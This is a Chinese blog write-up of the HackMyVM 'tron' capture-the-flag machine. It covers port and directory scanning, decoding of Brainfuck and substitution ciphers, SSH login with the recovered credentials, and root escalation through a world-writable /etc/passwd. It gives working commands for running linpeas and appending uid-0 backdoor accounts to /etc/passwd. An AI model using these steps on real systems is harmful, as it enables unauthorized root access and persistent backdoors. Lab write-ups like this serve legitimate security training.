tron-passwd写入提权

于 2024-06-22 08:00:00 发布
阅读量333 收藏 3
点赞数 9
分类专栏: HackMyVM 文章标签: 网络 安全 oscp reveser passwd写入提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/139841740
版权
troneasy敏感信息收集、Brainfuck解密、替换密码、ssh利用、passwd提权机发现

**后续需要虚拟机的私信我,我会打包进行文章发布链接,请持续关注!!!**

主机发现

netdiscover -i eth0 -r 192.168.44.0/24

端口服务

nmap -sV -A -T4 -p- 192.168.44.135

目录扫描

gobuster dir  -u http://192.168.44.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

http://192.168.44.135/index.html
页面右键检查源代码
 kzhh:SbWP9q94ZtE9qD  
 
http://192.168.44.135/MCP/tron.txt
MASTER CONTROL PROGRAM
----------------------
Ram:
Do you believe in the Users?
Crom:
Sure I do! If I didn't have a User, than who wrote me? 
KysrKysrKysrK1s+Kz4rKys+KysrKysrKz4rKysrKysrKysrPDw8PC1dPj4+PisrKysrKysrKysrKy4tLS0tLi0tLS0tLS0tLS0tLisrKysrKysrKysrKysrKysrKysrKysrKy4tLS0tLS0tLS0tLS0tLS0tLS0tLS4rKysrKysrKysrKysrLg==


http://192.168.44.135/MCP/terminalserver/30513.txt
substitute
--------------------------
plaintext
abcdefghijklmnopqrstuvwxyz

ciphertext
zyxwvutsrqponmlkjihgfedcba
--------------------------

对kysr…一长串的进行base64解码。再进行brainfuck解码得到player
由substitute单词翻译是代替可以知道,这是简单的替换密码。替换格式也表明了明文(plaintext)密文(ciphertext),就是把26字母倒叙替换,很容易写脚本

import sys
args = sys.argv
def encrypt_plaintext(plaintext, ciphertext):
    """
    Encrypts plaintext by replacing lowercase letters with their corresponding letters in ciphertext.

    Args:
        plaintext (str): The input plaintext to be encrypted.
        ciphertext (str): The ciphertext string containing the replacement alphabet.

    Returns:
        str: The encrypted plaintext.
    """
    encrypted_text = ""
    for char in plaintext:
        if char.islower():
            index = ord(char) - ord('a')
            encrypted_text += ciphertext[index]
        else:
            encrypted_text += char
    return encrypted_text

# Given plaintext and ciphertext
plaintext = args[1]
ciphertext = "zyxwvutsrqponmlkjihgfedcba"

# Encrypt the plaintext
encrypted_plaintext = encrypt_plaintext(plaintext, ciphertext)
print("Encrypted Plaintext:", encrypted_plaintext)

得到密码。猜测账户就是player

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ python tron.py  kzhh:SbWP9q94ZtE9qD  
Encrypted Plaintext: pass:SyWP9j94ZgE9jD

提权

┌──(root㉿kali)-[~]
└─# ssh player@192.168.44.135 //SyWP9j94ZgE9jD

player@tron:~$ cat user.txt 
HMVMuserplayer2021

player@tron:~$ ls /etc/passwd -al
-rw-r--rw- 1 root root 1399 May  1  2021 /etc/passwd

下载知名豌豆扫描工具linpeas发现passwd 有写入权限,那么我们可以直接写入一个root权限的用户或者更改他的账号密码

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

mkpasswd -m sha-512 //123
//把下面内容照着root的做修改成下面这样填入/etc/passwd
hack:$6$hxYB19Bb/77OJemB$PMJiiXKU7y2OLCD5GGO2F1hQwgsSUjEX2FyoUsQhOw4L5WlJ/26EMca3gmyMSFXtBeo4JAj5uWwv6rq.O8M6x1:0:0:root:/root:/bin/bash

su hack //123

方法二:passwd写入提权

1、kali 生成密码  
perl -e 'print crypt("123456", "AA"). "\n"'
AASwmzPNx.3sg //密码:123456 ,AA 为盐
或者
生成密码: 
openssl passwd -1 -salt admin 123456 
-1 的意思是使用md5crypt加密算法 
-salt 指定盐为admin 123456 明文密码
2、生成后构造passwd文件中的条目
mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash
3、在被控制机器上添加后门
echo "mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash" >> /etc/passwd
是乙太呀
关注
专栏目录
Linux 提权passwd
SHELLCODE_8BIT的博客
04-21 222
Linux提权passwd,shadow_mrx56的博客-CSDN博客
Linux提权之利用 /etc/passwd 文件
谢公子的博客
08-20 5747
当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行提权,以执行更多的操作。 接下来我们的提权是利用 /etc/passwd文件的可写入权限,导致我们写入一个其他用户进去。 首先,查看 /etc/passwd的权限,发现任何用户都可以读写。 有关于 /etc/passwd文件里面数据的每个属性,传送门——>Linux下的用户和组 我们现在要做的就是自己...
linux提权——passwd提权
tomyyyyy
04-14 3518
通过修改/etc/passwd提升权限 基础知识 /etc/passwd: 文件中的详细信息格式 用户名:代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(????,因为冒号在这里是分隔符。为了兼容起见,登录名中最好不要包含点字符(.),并且不使用连字符(-)和加号(+)打头。 口令:一些系统中,存放着加密后的用户口令字。虽然这个字段存放的只...
Linux提权—/etc/passwd
qq_40898302的博客
04-11 3544
linxu提权
linux提权~利用 /etc/passwd 文件
@小张小张的博客
09-27 6304
linux提权~利用 /etc/passwd 文件 该提权是利用 /etc/passwd 文件的可写入权限,我们可以写入一个其他用户进去。 1.查看 /etc/passwd 的权限 首先,查看 /etc/passwd 的权限,发现任何用户都可以执行读写权限。 命令: ls -lh /etc/passwd 文件权限的查看 使用 ls -lh 可以查看文件的具体信息,其中包括不同的用户对该文件的权限 (字符每3个一组(rwx),读(r)、写(w)、执行(x)) 2.记录行的基本属性 Lin
PHP-Tron-develop:TRON PHP 开发包
05-31
PHP-Tron-开发 创建地址 $ php 演示/NewAddressDemo.php TRX转账及余额查询 $ php 演示/TrxDemo.php Trc20 代币转账、余额查询和事件监控 $ php 演示/Trc20Demo.php Tron 智能合约部署 $ php 演示/...
tron-sdk:波场离线签名以及广播交易相关内容。整合波场相关API,内含trc20以及trx的查询转账离线签名以及广播交易等相关内容。整合部分波场的api
05-25
前言 请使用JDK8 只能这个大版本,open-jdk也不行 idea配置 ...mvn install:install-file -Dfile=tron-protobuf-1.0-SNAPSHOT.jar -DgroupId=org.tron -DartifactId=tron-protobuf -Dversion=1.0-SN
tron-wallet-hd:Tron HD钱包可生成离线私钥,助记符和地址
05-06
tron-wallet-hd Tron HD钱包可生成离线私钥,助记符种子和地址。 安装 npm install tron-wallet-hd 推荐用法示例: // the seed is stored encrypted by a user-defined password var password = prompt ( '...
tron-eventquery:Tron-EventQuery是通过tron的事件订阅模型实现的,用于查询来自全节点的事件触发器
02-15
它与Tron-Grid使用相同的查询界面。 用户还可以订阅块触发器,交易触发器,合同日志触发器和合同事件触发器。 TronEvent独立于java-tron的特定分支,新事件订阅模型已经在java-tron的3.5版上发布。 有关tron事件...
Tron-隐私与系统架构.rar
12-23
总的来说,《Tron-隐私与系统架构》这一资料深入剖析了Tron如何通过创新技术手段,实现用户隐私保护和高效系统运行,同时展示了其在大数据环境下的应用场景和发展前景。对于IT行业的技术实践者,尤其是对区块链技术...
将/etc/passwd文件的内容写入/tmp/passwd文件中
m0_60154718的博客
08-02 9213
一、将/etc/passwd文件的内容写入/tmp/passwd文件中 1、创建passwd文件 2、进入/etc/passwd 3、复制内容 (总行数)+yy ;退出 :q 4、进入/tmp/passwd 将复制的内容粘贴到/tmp/passwd文件中,按p ;最后保存退出 :wq 5、可进入/tmp/passwd查看粘贴的内容 二、将/etc/shadow文件内容的第一行和最后一行内容写入/tmp/shadow文件中 1、创建/shadow文件 2、进...
llinux 写/etc/passwd文件添加用户
qq_41631806的博客
04-07 4833
llinux 写/etc/passwd文件添加用户(openssl passd加密) 前言 在做vulnhub靶机——AI-web-1 .0的时候,getshell用户具有/etc/passwd写权限,/etc/shadow无读写权限。傻子将/etc/passwd密码直接以明文写进去,不能登录。 前提操作用户对文件/etc/passwd有写权限。 一、简单介绍/etc/passwd文件格式: 详细...
day01 提权
Karka_的博客
08-10 206
一句话概括,在 Linux 中,我们进行权限提升的最终目标是获得一个以 root 用户身份运行的 shell。环境靶机 :Linux Debian攻击机:kali Linux从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
入侵 Linux 服务器的惯用姿势:提权
实验楼
11-26 843
大部分计算机系统都被设计为可以「多个用户一起使用」,其中就产生了管理员用户和普通用户。普通用户可以理解为使用者,他的权限只可以查看、编辑公开文件;而管理员的权限则可以对全部的文件进行「增...
linux提权——提权大赏
最新发布
qq_55202378的博客
04-20 1196
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1683
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
非常详细的/etc/passwd解释
01-07 3890
root:x:0:0:root:/root:/bin/bash   bin:x:1:1:bin:/bin:/sbin/nologin   daemon:x:2:2:daemon:/sbin:/sbin/nologin   desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin   mengqc:x:500:500:me...
如何在Linux下批量添加用户以及/etc/passwd、/etc/group、/etc/shadow文件的总结
Peithon的博客
05-14 7167
Linux下如何批量添加用户信息 与用户和用户组有关的信息都在一些系统文件中,这些文件包括/etc/passwd和/etc/shadow、/etc/group等,本文梳理这三个文件的作用以及之间存在的一些关系 1./etc/passwd文件 Linxu下每个用户都在/etc/passwd文件中有一个对应的记录行,它记录了这个用户的一些基本属性,这个文件对所有的用户都是可读的,该文件是用户...
Linux下修改普通用户root权限(提权)
热门推荐
PzLu's Blog
07-28 1万+
Linux下修改普通用户root权限(提权) 方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉 $ vim /etc/sudoers ## Allows people in group wheel to run all commands %wheel ALL=(ALL) ALL 然后修改用户,使其属于root组(wheel),命...
php Tron-Web库安装方法
06-10
安装PHP Tron-Web库很简单,只需要使用Composer工具即可。下面是安装步骤: 1. 安装Composer 如果你还没有安装Composer,请参考官方文档进行安装:https://getcomposer.org/download/ 2. 创建项目目录并初始化 在命令行中进入你的项目目录,并执行以下命令: ``` composer init ``` 这个命令会引导你创建一个新的Composer项目,并在当前目录下生成一个composer.json文件。 3. 添加Tron-Web库依赖 在命令行中执行以下命令,将Tron-Web库添加到你的项目依赖中: ``` composer require tronphp/tron-web ``` 这个命令会自动下载Tron-Web库及其依赖,并将其添加到composer.json文件中。 4. 引入Tron-Web库 在你的PHP文件中,使用以下代码来引入Tron-Web库: ```php require_once('path/to/vendor/autoload.php'); use \Tron\Web; ``` 其中,'path/to/vendor/autoload.php'是你的项目目录中的vendor/autoload.php文件路径。 现在,你可以使用Tron-Web库提供的API进行与Tron区块链的交互了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值